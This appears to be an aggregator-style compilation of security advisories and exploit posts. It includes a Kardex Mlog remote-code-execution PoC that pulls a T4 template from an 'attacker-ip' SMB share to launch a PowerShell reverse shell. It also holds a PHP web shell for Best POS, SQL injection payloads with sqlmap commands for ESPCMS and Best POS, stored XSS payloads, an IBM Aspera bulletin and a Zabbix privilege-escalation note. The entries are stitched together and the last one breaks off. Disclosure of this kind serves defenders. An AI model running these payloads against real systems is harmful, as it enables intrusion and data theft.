Kardex Mlog MCC version 5.7.12+0-a203c2a213-master suffers from a file inclusion vulnerability that allows for remote code execution.

Remote Code Execution in Kardex MLOG  
=======================================================================  
       Product: Kardex Mlog MCC  
         Vendor: Kardex Holding AG  
      Tested Version: 5.7.12+0-a203c2a213-master  
         Fixed Version: inline patch - no new version number  
         Vulnerability Type: Improper Control of Generation of Code ("RFI") - CWE-94  
     CVSSv2 Severity: AV:A/AC:L/Au:N/C:C/I:C/A:C - Score 8.3  
            CVSSv3 Severity: AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Score 9.6  
            Solution Status: fixed  
  Manufacturer Notification: 2022-12-13  
       Solution Date: 2023-01-24  
   Public Disclosure: 2023-02-07  
       CVE Reference: CVE-2023-22855  
        Authors of Advisory: Patrick Hener & Nico Viakowski

=======================================================================

Vendor description[1]  
---------------------

Kardex Mlog’s modular software solution Kardex Control Center manages material  
flow and warehouse management processes faster and more efficiently.

 From manual block warehouse and interface networking with intelligent partner  
systems to an automated intralogistics system connected to production lines and  
driverless vehicles, intelligent energy management for the automated stacker  
cranes and modern system visualization, the Kardex Control Center modules offer  
flexible solutions for your warehouse management.

Vulnerability Details  
---------------------

The .NET based software spawns a web interface listening on port 8088.  
This interface is meant to control and monitor the material flow.

The user controllable path is handed to a path concatenation function  
(`Path.Combine`) without proper sanitization. This yields the possibility to  
include local files, as well as remote files (SMB). The path is used in a  
function called `getFile`.

The following code snippet shows the vulnerable part of this function:

```cs  
public MccHttpServerResult GetFile(string path, string acceptEncoding, string queryString = null)  
  {  
    MccHttpServerResult result4;

[... snip ...]

else  
{  
  string getfileName = (path == "/") ? "index.html" : path.Substring(1).Replace("/", Path.DirectorySeparatorChar.ToString(CultureInfo.InvariantCulture));  
  string fileName = Path.Combine(this.RootDirectory(), getfileName);  
  string originalFileName = fileName;  
```

The .Net function `Path.Combine` also is able to concatenate remote targets. For  
example using `\\ipaddress` you can include files from a remote samba server.

Further down the request flow, the application is checking for the MIME type of  
the file retrieved.

Depending on the MIME type the content is either sent through a  
import/export procedure or rendered as `mono/t4` template. The function  
`getMimeType` will return `t4` if the included file is ending with an extension  
of `.t4`.

This is where the File Inclusion can be escalated to a Remote Code Execution.  
The `mono/t4` templating engine allows the use of `C#` to evaluate code.  
This enables an attacker to gain code execution and eventually spawn a reverse  
shell.

```cs  
bool flag15 = File.Exists(fileName);  
  if (flag15)  
    {  
    using (FileStream f = new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.ReadWrite))  
    {  
      byte[] bytes = new byte[f.Length];  
      f.Read(bytes, 0, bytes.Length);  
      bool flag16 = mime2 == "t4";  
      if (flag16)  
        {  
          return this.runTemplatingEngine(bytes, responseHeaders, queryString);  
        }  
```

Proof of Concept (PoC)  
----------------------

The following request will include a remote file from an smb share. For this to  
work the attacker has to spawn an smb server (for example using `smbserver.py`  
from Impacket[2]).

```  
GET /\\attacker-ip/share/exploit.t4 HTTP/1.1  
Host: vulnerable.host.internal:8088  
Content-Type: text/html  
User-Agent: curl/7.86.0  
Accept: */*  
Connection: close  
```

The `exploit.t4` looks like this:

```html  
<#@ template language="C#" #>  
<#@ Import Namespace="System" #>  
<#@ Import Namespace="System.Diagnostics" #>

Proof of Concept - SSTI to RCE  
RCE running ...

<#  
var proc1 = new ProcessStartInfo();  
string anyCommand;  
anyCommand = "powershell -e revshell-base64-blob";

proc1.UseShellExecute = true;  
proc1.WorkingDirectory = @"C:\Windows\System32";  
proc1.FileName = @"C:\Windows\System32\cmd.exe";  
proc1.Verb = "runas";  
proc1.Arguments = "/c "+anyCommand;  
Process.Start(proc1);  
#>

Enjoy your shell, good sir :D  
```

The exploit above will execute `cmd.exe` and launch a `powershell` to execute  
a reverse shell. You can easily generate a reverse shell blob using  
revshells.com[3].

A full exploit spawning a reverse shell was created[4].

Solution  
--------

The user supplied data should be sanitized before using it in the `Path.Combine`  
function.

Disclosure Timeline  
-------------------

2022-12-13: Vulnerability discovered  
2022-12-13: Vulnerability reported to manufacturer  
2023-01-24: Solution provided by manufacturer  
2023-02-07: Public disclosure of vulnerability

References  
----------

[1] Vendor Website:https://www.kardex.com/en/mlog-control-center  
[2] Impacket Git Repository:https://github.com/SecureAuthCorp/impacket  
[3] Reverse Shell Generator:https://www.revshells.com/  
[4] Exploit on Exploit-DB (tbd):https://www.exploit-db.com/exploits/xxxxx    
[5] Blog Post Advisory:https://hesec.de/posts/cve-2023-22855     
[6] Personal Github Repo for Advisory:https://github.com/patrickhener/CVE-2023-22855     
[7] Blog Post Thinking Objects:https://to.com/blog/advisory-kardex-mlog-CVE-2023-22855   

Credits  
-------

This security vulnerability was found by Patrick Hener and Nico Viakowski.

E-Mail:patrickhener@posteo.de  
E-Mail:n.viakowski@pm.me  

Disclaimer  
----------

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible.

Copyright  
---------

Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en

Kardex Mlog MCC 5.7.12+0-a203c2a213-master File Inclusion / Remote Code Execution

IBM Aspera Faspex 4.4.1 could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.

**Security Bulletin**

  

**Summary**

This Security Bulletin addresses security vulnerabilities that have been remediated in IBM Aspera Faspex 4.4.2 PL2.

**Vulnerability Details**

**CVEID:**   CVE-2022-28330  
**DESCRIPTION:**   Apache HTTP Server could allow a remote attacker to obtain sensitive information. An attacker could exploit this vulnerability to read beyond bounds when configured to process requests with the mod\_isapi module.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228341 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2023-22868  
**DESCRIPTION:**   IBM Aspera Faspex is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 5.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/244117 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

**CVEID:**   CVE-2022-30556  
**DESCRIPTION:**   Apache HTTP Server could allow a remote attacker to obtain sensitive information, caused by an error in mod\_lua with websockets. An attacker could exploit this vulnerability to return lengths to applications calling r:wsread() that point past the end of the storage allocated for the buffer.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228336 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2022-31813  
**DESCRIPTION:**   Apache HTTP Server could allow a remote attacker to bypass security restrictions, caused by the failure to send the X-Forwarded-\* headers to the origin server based on client side Connection header hop-by-hop mechanism. An attacker could exploit this vulnerability to bypass IP based authentication on the origin server/application.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228337 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2022-30522  
**DESCRIPTION:**   Apache HTTP Server is vulnerable to a denial of service when configured to do transformations with mod\_sed in contexts where the input to mod\_sed may be very large. By making excessively large memory allocations, a remote attacker could exploit this vulnerability to trigger an abort.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228338 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2022-47986  
**DESCRIPTION:**   IBM Aspera Faspex could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2.  
CVSS Base score: 8.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/243512 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2022-28615  
**DESCRIPTION:**   Apache HTTP Server could allow a remote attacker to obtain sensitive information, caused by a read beyond bounds in ap\_strcmp\_match() when provided with an extremely large input buffer. An attacker could exploit this vulnerability to crash or disclose information.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228340 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L)

**CVEID:**   CVE-2022-26377  
**DESCRIPTION:**   Apache HTTP Server is vulnerable to HTTP request smuggling, caused by an inconsistent Interpretation of HTTP Requests vulnerability in mod\_proxy\_ajp. An attacker could exploit this vulnerability to smuggle requests to the AJP server it forwards requests to.  
CVSS Base score: 7.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228343 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2018-25032  
**DESCRIPTION:**   Zlib is vulnerable to a denial of service, caused by a memory corruption in the deflate operation. By using many distant matches, a remote attacker could exploit this vulnerability to cause the application to crash.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/222615 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-2068  
**DESCRIPTION:**   OpenSSL could allow a remote attacker to execute arbitrary commands on the system, caused by improper validation of user-supplied input by the c\_rehash script. By sending a specially-crafted request using shell metacharacters, an attacker could exploit this vulnerability to execute arbitrary commands with the privileges of the script on the system.  
CVSS Base score: 7.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/226018 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**Affected Products and Versions**

IBM Aspera Faspex 4.4.1 and earlier

**Remediation/Fixes**

It is recommended to apply the fix as soon as possible, see link below.

**Product(s)**

**Fixing VRM**

**Platform**

**Link to Fix**

IBM Aspera Faspex

4.4.2 PL2

Windows

click here

IBM Aspera Faspex

4.4.2 PL2

Linux

click here

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

CVE-2023-22868 and CVE-2022-47986 were reported to IBM by Max Garrett - Assetnote

**Change History**

26 Jan 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSGPEF","label":"IBM Aspera Faspex"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"}\],"Version":"4.4.2","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-47986: IBM Aspera Faspex 4.4.2 PL2 has addressed multiple vulnerabilities (CVE-2022-28330, CVE-2023-22868, CVE-2022-30556, CVE-2022-31813, CVE-2022-30522, CVE-2022-47986, CVE-2022-28615, CVE-2022-26377, CVE-

An issue was discovered in ESPCMS P8.21120101 after logging in to the background, there is a SQL injection vulnerability in the function node where members are added.

****Issue****

After logging in to the background, there is a SQL injection vulnerability in adding member function points

****Steps to reproduce****

1.  Log in to the management background
2.  Click Member>Add Member  
      
      
    

Problematic packets:

    GET /espcms_admin/index.php?act=X9DCVqHOg51sW5WnJNik2%2BEh6%2BhfdozuajbeQYirJJk%3D&verify_value=xxx&verify_key=username&verifyType=0 HTTP/1.1
    Host: 127.0.0.1:8010
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://127.0.0.1:8010/espcms_admin/index.php?act=RCJVc7i2vPJsW5WnJNik2yqO9KotWWATQJ%2BJr83OPQ4%3D&par_iframes_name=espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36&iframes_name=espcms_tab_iframe_731749b97e8fc862e9de34d80c1fa7c8&freshid=0.07419096625411115
    Cookie: espcms_tab_iframe_5590a90a573784a598205a10098c0b2a_now_page=0; espcms_tab_iframe_5590a90a573784a598205a10098c0b2a_per_page_num=20; espcms_tab_iframe_5422a5273a8fd3166593e06f654c7965_now_page=1; espcms_tab_iframe_5422a5273a8fd3166593e06f654c7965_per_page_num=20; espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36_now_page=0; espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36_per_page_num=20; espcms_admin_user_info=vHzemLN06s%2BCBCZmysn5BEspscayx5moFZbFc%2BYiMsiK0A8JxQV1DgryT8ALHbP%2FpWpbeeMDWVhDSQf9nN0bg2oehJsC38ek42J4vhZ%2BEpBhUHpwgyAokKcDe9vfVTK81r9Qa0Zk0J46c5yrfur061b%2B5m%2F63da2Tp1gB7Bzm1wUVS5K648%2B8RXzpevd9RO03oyPJPqCojA0scG7KhdhwuutSQMB1m71Ng4%2BPvDfjsR%2FlRBzorN2mVwfNgUpPvbLOU0HNAi9NgJAwOPqLRQaP6G3EItDbWNtTVcfATuOhD2wspV3ear%2Bx7iP0kfiTurVPrUe%2FJPzcqhl3ubkaeNRuRhCKQsDDu8Iac%2FKrilQamMDIkjdXmZhHNY6an3KLn7247Nlm9K4zgTeEOesUWP2YGKnN0mtOfNbgBQNJRcx5rFfSW0VlP%2BVIzSxwbsqF2HCMSQ44W0oifYTfA69ictDGQ0uLADH%2BpdZ; espcms_admin_user_server_info=N8LTSEOntanP%2Bv9d2FaEWTLHmuuYWpMc8zj6G50bHR%2Fr%2BZotmzdaJM%2F6%2F13YVoRZNBBGeYuLw0rz73sgkXaYDqOpkSEbSBU5; PHPSESSID=nh6n2915gtuedqm93nql1nuv1k; espcms_setup_db=a%3A14%3A%7Bs%3A7%3A%22db_host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A7%3A%22db_name%22%3Bs%3A15%3A%22espcms_p8_demo1%22%3Bs%3A7%3A%22db_user%22%3Bs%3A4%3A%22root%22%3Bs%3A11%3A%22db_password%22%3Bs%3A4%3A%22root%22%3Bs%3A9%3A%22db_prefix%22%3Bs%3A7%3A%22espcms_%22%3Bs%3A12%3A%22db_setuptype%22%3Bs%3A1%3A%220%22%3Bs%3A11%3A%22db_linktype%22%3Bs%3A1%3A%220%22%3Bs%3A13%3A%22module_dbdemo%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22module_app%22%3Bs%3A1%3A%220%22%3Bs%3A14%3A%22admin_username%22%3Bs%3A5%3A%22admin%22%3Bs%3A11%3A%22admin_email%22%3Bs%3A15%3A%22admin%40admin.com%22%3Bs%3A14%3A%22admin_password%22%3Bs%3A8%3A%22admin123%22%3Bs%3A19%3A%22validation_password%22%3Bs%3A8%3A%22admin123%22%3Bs%3A7%3A%22webname%22%3Bs%3A6%3A%22espcms%22%3B%7D; espcms_admin_login_verification_code=93CeyfmSi1jO%2BQUah35IwA%3D%3D
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    

use sqlmap: sqlmap.py -r ss.txt -p verify\_key --current-db

    ---
    Parameter: verify_key (GET)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: act=or73S4mLbK+u7ZRDsPSnahehmi0uNdR25zCzZisJjaI=&verify_value=xxxx&verify_key=username AND (SELECT 3018 FROM (SELECT(SLEEP(5)))QCXL)&verifyType=0
    ---

CVE-2023-23007: There is a sql injection vulnerability in ESPCMS P8.21120101 · Issue #I680WG · 轻舞飞沙/易思ESPCMS-P8企业建站管理系统 - Gitee.com

Best POS Management System version 1.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Authenticated Remote Code Execution on File Upload# Google Dork: NA# Date: 17/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA### Steps to Reproduce1- Login as Admin Rule2- Head to " http://localhost/kruxton/index.php?page=site_settings"3- Try to Upload an image here it will be a shell.php```shell.php``````<?php system($_GET['cmd']); ?>4- Head to http://localhost/kruxton/assets/uploads/5- Access your uploaded Shellhttp://localhost/kruxton/assets/uploads/1676627880_shell.png.php?cmd=whoami

Best POS Management System 1.0 Shell Upload

Best POS Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Exploit Title: SQL Injection on Best pos Management System# Google Dork: NA# Date: 14/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA```GET /kruxton/billing/index.php?id=9 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/109.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://localhost/kruxton/index.php?page=ordersCookie: PHPSESSID=61ubuj4m01jk5tibc7banpldaoUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1```# PayloadGET parameter 'id' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 58HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=9 AND 4017=4017    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: id=9 OR (SELECT 7313 FROM(SELECTCOUNT(*),CONCAT(0x7162767171,(SELECT(ELT(7313=7313,1))),0x7178707671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=9 AND (SELECT 5871 FROM (SELECT(SLEEP(5)))rwMY)    Type: UNION query    Title: Generic UNION query (NULL) - 6 columns    Payload: id=-9498 UNION ALL SELECTNULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x53586b446c4c75556d48544175547856636d696171464e624c6572736f55415246446a4b56777749,0x7178707671),NULL------[19:33:33] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0 (MariaDB fork)```----------------------------# Exploit Title: SQL Injection on Best pos Management System# Google Dork: NA# Date: 17/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA_________python sqlmap.py -u "http://localhost/kruxton/manage_user.php?id=4*"--dbms=mysql --level 3 --risk 3 --dbs --fresh-queriesURI parameter '#1*' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 52HTTP(s) requests:---Parameter: #1* (URI)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> AND 6332=6332    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> OR (SELECT 6586FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT(ELT(6586=6586,1))),0x7170787871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> AND (SELECT 3605 FROM(SELECT(SLEEP(5)))zHgC)    Type: UNION query    Title: Generic UNION query (NULL) - 5 columns    Payload: http://localhost:80/kruxton/manage_user.php?id=-1830<http://localhost/kruxton/manage_user.php?id=-1830> UNION ALL SELECTNULL,NULL,CONCAT(0x716a6b6a71,0x4b5276534542756c4e596a4f7377506a73517a73544b4e44737946636674736c526c775277594976,0x7170787871),NULL,NULL------[10:58:18] [INFO] the back-end DBMS is MySQLweb application technology: PHP, Apache 2.4.54, PHP 8.0.25back-end DBMS: MySQL >= 5.0 (MariaDB fork)

Best POS Management System 1.0 SQL Injection

Best POS Management System version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.

# Exploit Title: Stored Cross Site Scripting on Best pos Management System  
# Google Dork: NA  
# Date: 14/2/2023  
# Exploit Author: Ahmed Ismail (@MrOz1l)  
# Vendor Homepage:  
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
# Software Link:  
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip  
# Version: 1.0  
# Tested on: Windows 11  
# CVE : NA

# Description

Payload : "><img src=x onerror=prompt(document.domain);>

# POC :  
1- Head to Add Category on  
"http://localhost/kruxton/index.php?page=add-category"

2- On Name Parameter add our Payload "><img src=x  
onerror=prompt(document.domain);>

3- After Adding This Category XSS will run

```

POST /kruxton/ajax.php?action=save_category HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/109.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------7128987773293048653857517  
Content-Length: 442  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/kruxton/index.php?page=add-category  
Cookie: PHPSESSID=61ubuj4m01jk5tibc7banpldao  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------7128987773293048653857517  
Content-Disposition: form-data; name="id"

-----------------------------7128987773293048653857517  
Content-Disposition: form-data; name="name"

XSSPOC"><img src=x onerror=prompt(document.domain);>  
-----------------------------7128987773293048653857517  
Content-Disposition: form-data; name="description"

This is POC  
-----------------------------7128987773293048653857517--  
```

--------------------------------------

# Exploit Title: Stored Cross Site Scripting on Best pos Management System  
# Google Dork: NA  
# Date: 17/2/2023  
# Exploit Author: Ahmed Ismail (@MrOz1l)  
# Vendor Homepage:  
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
# Software Link:  
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip  
# Version: 1.0  
# Tested on: Windows 11  
# CVE : NA

Payload : "><img src=x onerror=prompt(document.domain);>

# POC :  
1- Head to Add Category on  
"http://localhost/kruxton/ajax.php?action=save_product"

2- On Name Parameter add our Payload "><img src=x  
onerror=prompt(document.domain);>

on description <img src=x onerror=prompt(2);>

3- After Adding This Category XSS will run

```

POST /kruxton/ajax.php?action=save_product HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/109.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------11015616619250686693182759357  
Content-Length: 830  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/kruxton/index.php?page=add-product  
Cookie: PHPSESSID=<COOKIE>  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="id"

-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="category_id"

3'  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="name"

XSSPOC2"><img src=x onerror=prompt(document.domain);>  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="description"

XSSPOC2"><img src=x onerror=prompt(2);>  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="price"

1122  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="status"

1  
-----------------------------11015616619250686693182759357--

```

Best POS Management System 1.0 Cross Site Scripting

Zabbix Agent and Zabbix Agent 2 versions 6.2.7 and below suffer from an issue where it does not secure the permissions on a non-default installation directory, allowing an attacker to place a malicious executable to escalate privileges.

    # Exploit Title: Zabbix agents - Insecure Permissions on non-default installation directory location# Discovery by: mmg# Discovery Date: 2023-01-23# Vendor Homepage: https://www.zabbix.com/download_agents# Software Link Zabbix agent : https://cdn.zabbix.com/zabbix/binaries/stable/6.2/6.2.7/zabbix_agent-6.2.7-windows-amd64-openssl.msi# Software Link Zabbix agent 2 : https://cdn.zabbix.com/zabbix/binaries/stable/6.2/6.2.7/zabbix_agent2-6.2.7-windows-amd64-openssl.msi# Tested Version: Zabbix agent and Zabbix agent 2 (v6.2.6, v6.2.7 and older versions)# Vulnerability Type: Local Privilege Escalation# Tested on OS: Windows 10 Pro Version 22H2 (OS Build 19045.2486) x64 version# CVSSv3 Vectors : https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H# CVE N/A# Step to discover:Go to Start and type powershell.Enter the following command and press Enter:Get-WmiObject win32_service | ?{ $_.Name -like '*zabbix*' -and $_.Pathname -notlike "*C:\Program Files*"}| select Name,PathName# Example of a vulnerable installationName           PathName----           --------Zabbix Agent   "C:\Software\Zabbix Agent\zabbix_agentd.exe" --config "C:\Software\Zabbix Agent\zabbix_agentd.conf"Zabbix Agent 2 "D:\software\Zabbix Agent 2\zabbix_agent2.exe" -c "D:\software\Zabbix Agent 2\zabbix_agent2.conf" -f=false# Exploit:A vulnerability was found in Zabbix Agents on non-default installation directory location. The Zabbix Agent executables have incorrect permissions, allowing a local unprivileged user to replace itwith a malicious file that will be executed with "LocalSystem" privileges which will result in completecompromise of Confidentiality, Integrity and Availability.# TimelineJan 23, 2023 - Reported to ZabbixFeb 1, 2023  - Zabbix does not consider this a vulnerabilityFeb 6, 2023  - Requested official approval to disclose itFeb 8, 2023  - Zabbix agrees with public disclosureFeb 13, 2023 - Public disclosure

Zabbix Agent 6.2.7 Insecure Permissions / Privilege Escalation

Red Hat Security Advisory 2023-0728-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.3.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.12.3 security update  
Advisory ID:       RHSA-2023:0728-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0728  
Issue date:        2023-02-16  
CVE Names:         CVE-2021-4238 CVE-2022-41717   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.12.3 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.12.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

